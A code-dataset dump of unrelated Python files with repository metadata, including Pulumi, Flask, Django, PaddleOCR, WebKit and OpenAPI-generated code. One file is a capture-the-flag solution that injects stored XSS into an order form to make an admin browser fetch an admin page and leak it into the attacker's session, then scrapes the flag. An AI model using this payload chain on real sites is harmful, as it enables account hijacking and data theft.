def is_https_allowed(self) -> pulumi.Output[Optional[bool]]:
"""
Indicates whether HTTPS traffic is allowed on the endpoint. Default value is true. At least one protocol (HTTP or HTTPS) must be allowed.
"""
return pulumi.get(self, "is_https_allowed")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="optimizationType")
def optimization_type(self) -> pulumi.Output[Optional[str]]:
"""
Specifies what scenario the customer wants this CDN endpoint to optimize for, e.g. Download, Media services. With this information, CDN can apply scenario driven optimization.
"""
return pulumi.get(self, "optimization_type")
@property
@pulumi.getter(name="originHostHeader")
def origin_host_header(self) -> pulumi.Output[Optional[str]]:
"""
The host header value sent to the origin with each request. If you leave this blank, the request hostname determines this value. Azure CDN origins, such as Web Apps, Blob Storage, and Cloud Services require this host header value to match the origin hostname by default.
"""
return pulumi.get(self, "origin_host_header")
@property
@pulumi.getter(name="originPath")
def origin_path(self) -> pulumi.Output[Optional[str]]:
"""
A directory path on the origin that CDN can use to retrieve content from, e.g. contoso.cloudapp.net/originpath.
"""
return pulumi.get(self, "origin_path")
@property
@pulumi.getter
def origins(self) -> pulumi.Output[Sequence['outputs.DeepCreatedOriginResponse']]:
"""
The source of the content being delivered via CDN.
"""
return pulumi.get(self, "origins")
@property
@pulumi.getter(name="probePath")
def probe_path(self) -> pulumi.Output[Optional[str]]:
"""
Path to a file hosted on the origin which helps accelerate delivery of the dynamic content and calculate the most optimal routes for the CDN. This is relative to the origin path.
"""
return pulumi.get(self, "probe_path")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning status of the endpoint.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="queryStringCachingBehavior")
def query_string_caching_behavior(self) -> pulumi.Output[Optional[str]]:
"""
Defines how CDN caches requests that include query strings. You can ignore any query strings when caching, bypass caching to prevent requests that contain query strings from being cached, or cache every request with a unique URL.
"""
return pulumi.get(self, "query_string_caching_behavior")
@property
@pulumi.getter(name="resourceState")
def resource_state(self) -> pulumi.Output[str]:
"""
Resource status of the endpoint.
"""
return pulumi.get(self, "resource_state")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="webApplicationFirewallPolicyLink")
def web_application_firewall_policy_link(self) -> pulumi.Output[Optional['outputs.EndpointPropertiesUpdateParametersResponseWebApplicationFirewallPolicyLink']]:
"""
Defines the Web Application Firewall policy for the endpoint (if applicable)
"""
return pulumi.get(self, "web_application_firewall_policy_link")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 58.277778 | 1,648 | 0.693253 |
4a27c9fc2b2bc7fd8e819a3deb5b2fd4c4afce93 | 198 | py | Python | src/typefit/__init__.py | Xowap/typefit | a1beedcc4b05be6d22063719e7e2aa8c3f2c35b3 | [
"WTFPL"
] | 5 | 2019-10-28T15:40:03.000Z | 2021-03-16T21:07:25.000Z | src/typefit/__init__.py | Xowap/typefit | a1beedcc4b05be6d22063719e7e2aa8c3f2c35b3 | [
"WTFPL"
] | 32 | 2019-10-19T08:40:12.000Z | 2022-01-21T19:07:09.000Z | src/typefit/__init__.py | Xowap/typefit | a1beedcc4b05be6d22063719e7e2aa8c3f2c35b3 | [
"WTFPL"
] | 3 | 2019-10-28T15:42:49.000Z | 2022-01-18T19:18:06.000Z | from . import httpx_models
from .fitting import Fitter, T, typefit
from .meta import meta, other_field
from .reporting import LogErrorReporter, PrettyJson5Formatter
from .serialize import serialize
| 33 | 61 | 0.833333 |
4a27cc5403be8c0bba8bc65721a0785f3bcc0608 | 160 | py | Python | app/main/__init__.py | koyoo-maxwel/news | 656166c47a5dc79b9f4b8516153c90a57f808cc9 | [
"MIT"
] | 2 | 2019-01-21T09:04:16.000Z | 2019-01-21T09:04:17.000Z | app/main/__init__.py | koyoo-maxwel/news | 656166c47a5dc79b9f4b8516153c90a57f808cc9 | [
"MIT"
] | null | null | null | app/main/__init__.py | koyoo-maxwel/news | 656166c47a5dc79b9f4b8516153c90a57f808cc9 | [
"MIT"
] | 2 | 2019-02-17T11:33:28.000Z | 2019-06-24T06:36:43.000Z | from flask import Blueprint
main = Blueprint('main',__name__)
from . import views
# Here we import the blueprint class from flask to avoid circular dependancies | 40 | 78 | 0.80625 |
4a27cc76ff15925a02c05ecf41a293a1c91330b2 | 4,000 | py | Python | criteo_marketing_transition/models/campaign_bid_change_response_message_with_details.py | criteo/criteo-python-marketing-transition-sdk | d6d19a23d87ab62eb4810f41490cebab9c72882f | [
"Apache-2.0"
] | null | null | null | criteo_marketing_transition/models/campaign_bid_change_response_message_with_details.py | criteo/criteo-python-marketing-transition-sdk | d6d19a23d87ab62eb4810f41490cebab9c72882f | [
"Apache-2.0"
] | null | null | null | criteo_marketing_transition/models/campaign_bid_change_response_message_with_details.py | criteo/criteo-python-marketing-transition-sdk | d6d19a23d87ab62eb4810f41490cebab9c72882f | [
"Apache-2.0"
] | 1 | 2022-02-21T11:16:20.000Z | 2022-02-21T11:16:20.000Z | # coding: utf-8
"""
Criteo API Transition Swagger
This is used to help Criteo clients transition from MAPI to Criteo API # noqa: E501
The version of the OpenAPI document: 1.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class CampaignBidChangeResponseMessageWithDetails(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'message': 'str',
'details': 'CampaignBidChangeResponse'
}
attribute_map = {
'message': 'message',
'details': 'details'
}
def __init__(self, message=None, details=None): # noqa: E501
"""CampaignBidChangeResponseMessageWithDetails - a model defined in OpenAPI""" # noqa: E501
self._message = None
self._details = None
self.discriminator = None
if message is not None:
self.message = message
if details is not None:
self.details = details
@property
def message(self):
"""Gets the message of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:return: The message of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:rtype: str
"""
return self._message
@message.setter
def message(self, message):
"""Sets the message of this CampaignBidChangeResponseMessageWithDetails.
:param message: The message of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:type: str
"""
self._message = message
@property
def details(self):
"""Gets the details of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:return: The details of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:rtype: CampaignBidChangeResponse
"""
return self._details
@details.setter
def details(self, details):
"""Sets the details of this CampaignBidChangeResponseMessageWithDetails.
:param details: The details of this CampaignBidChangeResponseMessageWithDetails. # noqa: E501
:type: CampaignBidChangeResponse
"""
self._details = details
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CampaignBidChangeResponseMessageWithDetails):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 28.776978 | 102 | 0.60125 |
4a27cc94c3305c6090718a2fe23e2ddb9a683a18 | 225 | py | Python | wallet_app/admin.py | Vicky-Rathod/django_ewallet_app | 7f5b6e5f06743225b2ee2e9fcad3ac336d1b3e95 | [
"MIT"
] | null | null | null | wallet_app/admin.py | Vicky-Rathod/django_ewallet_app | 7f5b6e5f06743225b2ee2e9fcad3ac336d1b3e95 | [
"MIT"
] | null | null | null | wallet_app/admin.py | Vicky-Rathod/django_ewallet_app | 7f5b6e5f06743225b2ee2e9fcad3ac336d1b3e95 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Transaction,Type,TopUp,Wallet
# Register your models here.
admin.site.register(Transaction)
admin.site.register(Type)
admin.site.register(TopUp)
admin.site.register(Wallet) | 32.142857 | 49 | 0.826667 |
4a27ccdbde4e06290df91bfa14f0e51677f5283b | 1,302 | py | Python | manage.py | Arlington1985/nn_rest_api_example | c17c61dcbbec4c59ad868293f495c621c533158b | [
"MIT"
] | null | null | null | manage.py | Arlington1985/nn_rest_api_example | c17c61dcbbec4c59ad868293f495c621c533158b | [
"MIT"
] | 1 | 2021-10-20T06:34:02.000Z | 2021-10-20T06:34:02.000Z | manage.py | Arlington1985/nn_rest_api_example | c17c61dcbbec4c59ad868293f495c621c533158b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Manager for maintenance works
import os
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
from app.db import db
from app import app
from app.models import UserModel, OperationModel
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
# Creating upload folder
@manager.command
def create_folder():
print(app.root_path)
print(app.instance_path)
print(app.config['BASEDIR'])
final_directory = os.path.join(app.config['BASEDIR'], app.config['UPLOAD_FOLDER'])
if not os.path.exists(final_directory):
os.makedirs(final_directory)
return "Folder with the name {} was created".format(final_directory)
else:
return "Folder with the name {} already exists".format(final_directory)
# Recreating database objects
@manager.command
def recreate_database():
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
print (app.config['SQLALCHEMY_DATABASE_URI'])
engine = create_engine(app.config['SQLALCHEMY_DATABASE_URI'])
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
return "Database recreated successfully"
if __name__ == '__main__':
manager.run() | 30.27907 | 86 | 0.751152 |
4a27cd77d62a127951fd75f377c61e0e2e4f7095 | 404 | py | Python | tests/test_models.py | AndreGuerra123/django-portrait | e777816ca7467ad3f354abe8bcddbdf4ae559bda | [
"MIT"
] | null | null | null | tests/test_models.py | AndreGuerra123/django-portrait | e777816ca7467ad3f354abe8bcddbdf4ae559bda | [
"MIT"
] | null | null | null | tests/test_models.py | AndreGuerra123/django-portrait | e777816ca7467ad3f354abe8bcddbdf4ae559bda | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_django-portrait
------------
Tests for `django-portrait` models module.
"""
from django.test import TestCase
from django_portrait import models
class TestDjango_portrait(TestCase):
def setUp(self):
self.portrait = models.Portrait()
def test_something(self):
assert self.portrait
def tearDown(self):
pass
| 15.538462 | 42 | 0.655941 |
4a27ce52a64da5a53d524f58d7613669171d5662 | 1,745 | py | Python | ppocr/modeling/heads/__init__.py | edencfc/PaddleOCR | 82c5966a642d07f99502d779c70a707fe3edbcb0 | [
"Apache-2.0"
] | 4 | 2021-07-29T13:57:22.000Z | 2022-03-21T09:47:53.000Z | ppocr/modeling/heads/__init__.py | edencfc/PaddleOCR | 82c5966a642d07f99502d779c70a707fe3edbcb0 | [
"Apache-2.0"
] | 1 | 2022-02-16T01:37:48.000Z | 2022-02-16T01:37:48.000Z | ppocr/modeling/heads/__init__.py | edencfc/PaddleOCR | 82c5966a642d07f99502d779c70a707fe3edbcb0 | [
"Apache-2.0"
] | 1 | 2021-07-28T15:49:38.000Z | 2021-07-28T15:49:38.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = ['build_head']
def build_head(config):
# det head
from .det_db_head import DBHead
from .det_east_head import EASTHead
from .det_sast_head import SASTHead
from .det_pse_head import PSEHead
from .e2e_pg_head import PGHead
# rec head
from .rec_ctc_head import CTCHead
from .rec_att_head import AttentionHead
from .rec_srn_head import SRNHead
from .rec_nrtr_head import Transformer
from .rec_sar_head import SARHead
from .rec_aster_head import AsterHead
# cls head
from .cls_head import ClsHead
#kie head
from .kie_sdmgr_head import SDMGRHead
from .table_att_head import TableAttentionHead
support_dict = [
'DBHead', 'PSEHead', 'EASTHead', 'SASTHead', 'CTCHead', 'ClsHead',
'AttentionHead', 'SRNHead', 'PGHead', 'Transformer',
'TableAttentionHead', 'SARHead', 'AsterHead', 'SDMGRHead'
]
#table head
module_name = config.pop('name')
assert module_name in support_dict, Exception('head only support {}'.format(
support_dict))
module_class = eval(module_name)(**config)
return module_class
| 31.727273 | 80 | 0.719771 |
4a27cf83e844893e6fe711fd9c82fc8d6280f97f | 1,004 | py | Python | logs.py | shinohe/mst-solution | 022fdae17d7464680db5cac3b81126d8b782afa8 | [
"MIT"
] | 1 | 2019-08-25T03:16:25.000Z | 2019-08-25T03:16:25.000Z | logs.py | shinohe/mst-solution | 022fdae17d7464680db5cac3b81126d8b782afa8 | [
"MIT"
] | null | null | null | logs.py | shinohe/mst-solution | 022fdae17d7464680db5cac3b81126d8b782afa8 | [
"MIT"
] | 1 | 2019-08-25T03:20:07.000Z | 2019-08-25T03:20:07.000Z | import os
import logging
from logging.handlers import RotatingFileHandler
def not_exist_makedirs(path):
if not os.path.exists(path):
os.makedirs(path)
def init_app(app, log_dir='.'):
formatter = logging.Formatter(
'%(asctime)s %(levelname)s: %(message)s '
'[in %(pathname)s:%(lineno)d]'
)
debug_log = os.path.join(app.root_path, 'logs/debug.log')
not_exist_makedirs(os.path.dirname(debug_log))
debug_file_handler = RotatingFileHandler(
debug_log, maxBytes=100000, backupCount=10
)
debug_file_handler.setLevel(logging.DEBUG)
debug_file_handler.setFormatter(formatter)
app.logger.addHandler(debug_file_handler)
error_log = os.path.join(app.root_path, 'logs/error.log')
not_exist_makedirs(os.path.dirname(error_log))
error_file_handler = RotatingFileHandler(
error_log, maxBytes=100000, backupCount=10
)
error_file_handler.setLevel(logging.ERROR)
error_file_handler.setFormatter(formatter)
app.logger.addHandler(error_file_handler)
app.logger.setLevel(logging.DEBUG)
| 28.685714 | 58 | 0.780876 |
4a27d297d2fccaf31f5704964f113813cd4f65a7 | 1,618 | py | Python | Gathered CTF writeups/2017-11-09-defcamp-final/fedora_shop/fedora.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:00:41.000Z | 2022-03-27T06:00:41.000Z | Gathered CTF writeups/2017-11-09-defcamp-final/fedora_shop/fedora.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | null | null | null | Gathered CTF writeups/2017-11-09-defcamp-final/fedora_shop/fedora.py | mihaid-b/CyberSakura | f60e6b6bfd6898c69b84424b080090ae98f8076c | [
"MIT"
] | 1 | 2022-03-27T06:01:42.000Z | 2022-03-27T06:01:42.000Z | import re
from time import sleep
import requests
s = requests.session()
session = "XYZ"
def main():
url = "https://fedora-shop.dctf-f1nals-2017.def.camp/complet.php"
telephone_script = """
<script>
window.onload=function(){
eval(document.getElementsByTagName('td')[15].innerText);
};
</script>
"""
address_script = """
xhr = new XMLHttpRequest();
xhr.open('POST','/?action=add&code=wfedora',true);
xhr.withCredentials=true;
document.cookie='PHPSESSID=""" + session + """';
xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xhr.send('quantity='+this.responseText);
"""
other_script = """
xhr = new XMLHttpRequest();
xhr.open('GET','/admin.php');
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE){
eval(document.getElementsByTagName('td')[14].innerText);
}
};
xhr.send();
"""
params = {"email": "[email protected]",
"telephone": "%s" % telephone_script,
"address": address_script,
"other": other_script,
"ordersum": "1234",
"tprice": "1234"}
s.get("https://fedora-shop.dctf-f1nals-2017.def.camp/index.php?action=remove&code=wfedora",
cookies={"PHPSESSID": session})
sleep(2)
r = s.post(url, data=params, cookies={"PHPSESSID": session})
# print(r.text)
while True:
r = s.get("https://fedora-shop.dctf-f1nals-2017.def.camp/index.php", cookies={"PHPSESSID": session})
result = re.findall('DCTF.*', r.text)
if len(result) > 0:
break
sleep(5)
print(result[0])
main()
| 27.896552 | 108 | 0.61063 |
4a27d33a80701ecea7ba56b42ba72cad83e7e2c3 | 2,377 | py | Python | third_party/WebKit/Tools/Scripts/webkitpy/style/checkers/png.py | google-ar/chromium | 2441c86a5fd975f09a6c30cddb57dfb7fc239699 | [
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 777 | 2017-08-29T15:15:32.000Z | 2022-03-21T05:29:41.000Z | third_party/WebKit/Tools/Scripts/webkitpy/style/checkers/png.py | harrymarkovskiy/WebARonARCore | 2441c86a5fd975f09a6c30cddb57dfb7fc239699 | [
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 66 | 2017-08-30T18:31:18.000Z | 2021-08-02T10:59:35.000Z | third_party/WebKit/Tools/Scripts/webkitpy/style/checkers/png.py | harrymarkovskiy/WebARonARCore | 2441c86a5fd975f09a6c30cddb57dfb7fc239699 | [
"Apache-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 123 | 2017-08-30T01:19:34.000Z | 2022-03-17T22:55:31.000Z | # Copyright (C) 2012 Balazs Ankes ([email protected]) University of Szeged
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Supports checking WebKit style in png files."""
from webkitpy.common import read_checksum_from_png
from webkitpy.common.system.system_host import SystemHost
class PNGChecker(object):
"""Check svn:mime-type for checking style"""
categories = set(['image/png'])
def __init__(self, file_path, handle_style_error, host=None):
self._file_path = file_path
self._handle_style_error = handle_style_error
self._host = host or SystemHost()
self._fs = self._host.filesystem
def check(self, inline=None):
if self._fs.exists(self._file_path) and self._file_path.endswith("-expected.png"):
with self._fs.open_binary_file_for_reading(self._file_path) as filehandle:
if not read_checksum_from_png.read_checksum(filehandle):
self._handle_style_error(
0, 'image/png', 5,
"Image lacks a checksum. Generate pngs using run-webkit-tests to ensure they have a checksum.")
| 49.520833 | 119 | 0.737484 |
4a27d429ee50a2a206a2f5360772a9005ec3d913 | 4,371 | py | Python | python/async_shared_example.py | Saevon/Recipes | ab8ca9b5244805d545da2dd1d80d249f1ec6057d | [
"MIT"
] | null | null | null | python/async_shared_example.py | Saevon/Recipes | ab8ca9b5244805d545da2dd1d80d249f1ec6057d | [
"MIT"
] | null | null | null | python/async_shared_example.py | Saevon/Recipes | ab8ca9b5244805d545da2dd1d80d249f1ec6057d | [
"MIT"
] | null | null | null | from async_shared import async_handler, sync_shared
# Async Creep
# ------------------------------------------------------------------------------
# Ways to handle it
# Writing Blocking primary code
# * Spin off ProcessPool or ThreadPool
# * But now you cannot get any async benefits (max blocking calls equals the number of threads)
# Writing Async primary code
# * Create a event_loop
# * BUT now you need to import all the async libraries in both cases
# (Ideally it would be optional)
# Writing Both
# * not DRY
# ------------------------------------------------------------------------------
# Example code
#
# Note: 'with' does not work (if you need blocking/async contextmanagers)
try:
import aiofiles
import asyncio
import fcntl
except ImportError:
logger.debug('Async Disabled')
import time
import os
import json
# Polyfill
# Not yet in aiofiles
aiofiles.path = object()
aiofiles.path.exists = aiofiles.os.wrap(os.path.exists)
# ------------------------------------------------------------------------------
# Create the mixed function calls
@async_handler
def sys_random(num_bytes):
return os.urandom(num_bytes)
@sys_random.register_async
async def sys_random_async(num_bytes):
async with aiofiles.open('/dev/urandom', 'rb') as rand_fh:
# Pretend its that easy to open a non-blocking file :)
rand_fh.non_blocking = True
while True:
data = await rand_fh.read(num_bytes)
if len(data) >= num_bytes:
return data
await asyncio.sleep(0.1)
@async_handler
def os_exists(path):
return os.path.exists(path)
@os_exists.register_async
async def os_exists_async(path):
return aiofiles.path.exists(path)
@async_handler
def sys_sleep(seconds):
time.sleep(seconds)
@sys_sleep.register_async
async def sys_sleep_async(seconds):
await asyncio.sleep(seconds)
class AsyncableFile():
def __init__(self, filename, mode):
self.filename = filename
self.mode = mode
self.fh = None
def _open_if_needed(self):
if self.fh:
return
self.fh = open(self.filename, self.mode)
async def _open_if_needed_async(self):
if self.fh:
return
self.fh = await aiofiles.open(self.filename, self.mode)
@async_handler
def read(self):
self._open_if_needed()
return self.fh.read()
@read.register_async
async def read_async(self):
await self._open_if_needed_async()
return await self.fh.read()
@async_handler
def close(self):
if self.fh:
self.fh.close()
@close.register_async
async def close_async(self):
if self.fh:
await self.fh.close()
# --------------------------------------------------------------------------------------------------
@sync_shared
def read_id(filepath):
if not (yield os_exists(filepath)):
raise Exception("File doesn't exist")
# Decomposed "With", since its not supported
file = AsyncableFile(filepath, 'r')
try:
raw_data = yield file.read()
finally:
yield file.close()
# END Decomposed
print(raw_data)
data = json.loads(raw_data)
keyid = data.get('id', None)
assert isinstance(keyid, int)
return keyid
@sync_shared
def main(filepath):
''' '''
print('sleeping')
yield sys_sleep(0.1)
keyid = (yield read_id.aevent(filepath))
folder = os.path.dirname(filepath)
keyfile = os.path.join(folder, 'keyfile_{}.json'.format(keyid))
print(keyfile)
if not (yield os_exists(keyfile)):
raise Exception("No Keyfile exists")
print('sleeping')
yield sys_sleep(0.1)
# Pretend we do something with that keyfile
print((yield sys_random(4)))
# Example traceback
'''
Traceback (most recent call last):
File "main.py", line 257, in <module>
main('tmp.txt')
File "async_shared.py", line 56, in wrapper_sync
event = coroutine.send(result)
File "main.py", line 246, in main
raise Exception("No Keyfile exists")
'''
if __name__ == '__main__':
print('========')
print("Synchronous")
main('tmp.txt')
print('========')
print("Asynchronous")
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(main.run_async('tmp.txt'))
finally:
loop.close()
| 22.884817 | 100 | 0.602837 |
4a27d47bff0ebcade592252aa76fda0ff4829b3c | 2,616 | py | Python | test/test_phones_and_emails.py | PaulRumyantsev/python_QA | 3d6809e49c2522da8cd912d2fe6f790df4293f5d | [
"Apache-2.0"
] | null | null | null | test/test_phones_and_emails.py | PaulRumyantsev/python_QA | 3d6809e49c2522da8cd912d2fe6f790df4293f5d | [
"Apache-2.0"
] | null | null | null | test/test_phones_and_emails.py | PaulRumyantsev/python_QA | 3d6809e49c2522da8cd912d2fe6f790df4293f5d | [
"Apache-2.0"
] | null | null | null | import re
from model.contacts import Contacts
from random import randrange
def test_phones_on_home_page(app):
if app.contacts.count() == 0:
app.contacts.create(Contacts(firstname="test"))
index = randrange(len(app.contacts.get_contacts_list()))
contact_from_home_page = app.contacts.get_contacts_list()[index]
contact_from_edit_page = app.contacts.get_contact_info_from_edit_page(index)
assert contact_from_home_page.firstname == contact_from_edit_page.firstname
assert contact_from_home_page.lastname == contact_from_edit_page.lastname
assert contact_from_home_page.address == contact_from_edit_page.address
assert contact_from_home_page.all_phones_from_home_page == merge_phones_like_on_home_page(contact_from_edit_page)
assert contact_from_home_page.all_emails_from_home_page == merge_emails_on_home_page(contact_from_edit_page)
#def test_emails_on_home_page(app):
#if app.contacts.count() == 0:
#app.contacts.create(Contacts(firstname="test"))
#contact_from_home_page = app.contacts.get_contacts_list()[0]
#contact_from_edit_page = app.contacts.get_contact_info_from_edit_page(0)
#assert contact_from_home_page.all_emails_from_home_page == merge_emails_on_home_page(contact_from_edit_page)
#def test_phones_on_contacts_view_page(app):
#contacts_from_view_page = app.contacts.get_contacts_from_view_page(0)
#contacts_from_edit_page = app.contacts.get_contact_info_from_edit_page(0)
#assert contacts_from_view_page.homephone == contacts_from_edit_page.homephone
#assert contacts_from_view_page.workphone == contacts_from_edit_page.workphone
#assert contacts_from_view_page.mobilephone == contacts_from_edit_page.mobilephone
#assert contacts_from_view_page.fax == contacts_from_edit_page.fax
#assert contacts_from_view_page.secondaryphone == contacts_from_edit_page.secondaryphone
def clear(s):
return re.sub("[() -],", "", s)
def merge_phones_like_on_home_page(contacts):
return "\n".join(filter(lambda x: x != "",
map(lambda x: clear(x),
filter(lambda x: x is not None,
[contacts.homephone, contacts.mobilephone,
contacts.workphone, contacts.secondaryphone]))))
def merge_emails_on_home_page(contacts):
return "\n".join(filter(lambda x: x != "",
map(lambda x: clear(x),
filter(lambda x: x is not None,
[contacts.email, contacts.email2, contacts.email3])))) | 50.307692 | 117 | 0.72133 |
4a27d47fa8742ccda2129af5468bf5b89ca295d9 | 335 | py | Python | apps/manager/purpleserver/manager/migrations/0008_remove_shipment_doc_images.py | rcknr/purplship-server | f8ec35af3da870fada0e989c20a8349c958c637c | [
"ECL-2.0",
"Apache-2.0"
] | 12 | 2020-02-03T08:11:21.000Z | 2021-04-13T02:00:38.000Z | apps/manager/purpleserver/manager/migrations/0008_remove_shipment_doc_images.py | rcknr/purplship-server | f8ec35af3da870fada0e989c20a8349c958c637c | [
"ECL-2.0",
"Apache-2.0"
] | 9 | 2020-02-12T00:25:08.000Z | 2021-04-20T10:31:59.000Z | apps/manager/purpleserver/manager/migrations/0008_remove_shipment_doc_images.py | rcknr/purplship-server | f8ec35af3da870fada0e989c20a8349c958c637c | [
"ECL-2.0",
"Apache-2.0"
] | 7 | 2020-02-03T08:10:50.000Z | 2021-04-13T15:17:12.000Z | # Generated by Django 3.1.7 on 2021-03-14 03:34
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('manager', '0007_merge_20210311_1428'),
]
operations = [
migrations.RemoveField(
model_name='shipment',
name='doc_images',
),
]
| 18.611111 | 48 | 0.6 |
4a27d4a7f4a2c4087aac72a3f2bc8857b71627b3 | 1,567 | py | Python | homeassistant/components/lightwave/__init__.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 23 | 2017-11-15T21:03:53.000Z | 2021-03-29T21:33:48.000Z | homeassistant/components/lightwave/__init__.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 9 | 2022-01-27T06:32:10.000Z | 2022-03-31T07:07:51.000Z | homeassistant/components/lightwave/__init__.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 10 | 2018-01-01T00:12:51.000Z | 2021-12-21T23:08:05.000Z | """Support for device connected via Lightwave WiFi-link hub."""
from lightwave.lightwave import LWLink
import voluptuous as vol
from homeassistant.const import CONF_HOST, CONF_LIGHTS, CONF_NAME, CONF_SWITCHES
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.discovery import async_load_platform
LIGHTWAVE_LINK = "lightwave_link"
DOMAIN = "lightwave"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
vol.All(
cv.has_at_least_one_key(CONF_LIGHTS, CONF_SWITCHES),
{
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_LIGHTS, default={}): {
cv.string: vol.Schema({vol.Required(CONF_NAME): cv.string})
},
vol.Optional(CONF_SWITCHES, default={}): {
cv.string: vol.Schema({vol.Required(CONF_NAME): cv.string})
},
},
)
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Try to start embedded Lightwave broker."""
host = config[DOMAIN][CONF_HOST]
hass.data[LIGHTWAVE_LINK] = LWLink(host)
lights = config[DOMAIN][CONF_LIGHTS]
if lights:
hass.async_create_task(
async_load_platform(hass, "light", DOMAIN, lights, config)
)
switches = config[DOMAIN][CONF_SWITCHES]
if switches:
hass.async_create_task(
async_load_platform(hass, "switch", DOMAIN, switches, config)
)
return True
| 29.018519 | 83 | 0.608168 |
4a27d53a4e44a1de396d94429584682d940f9b3e | 80 | py | Python | src/atcoder/score.py | competitive-programming-helper/atcoder-api | 2e90b73349ad30a35a944e546b96af3eef75706b | [
"MIT"
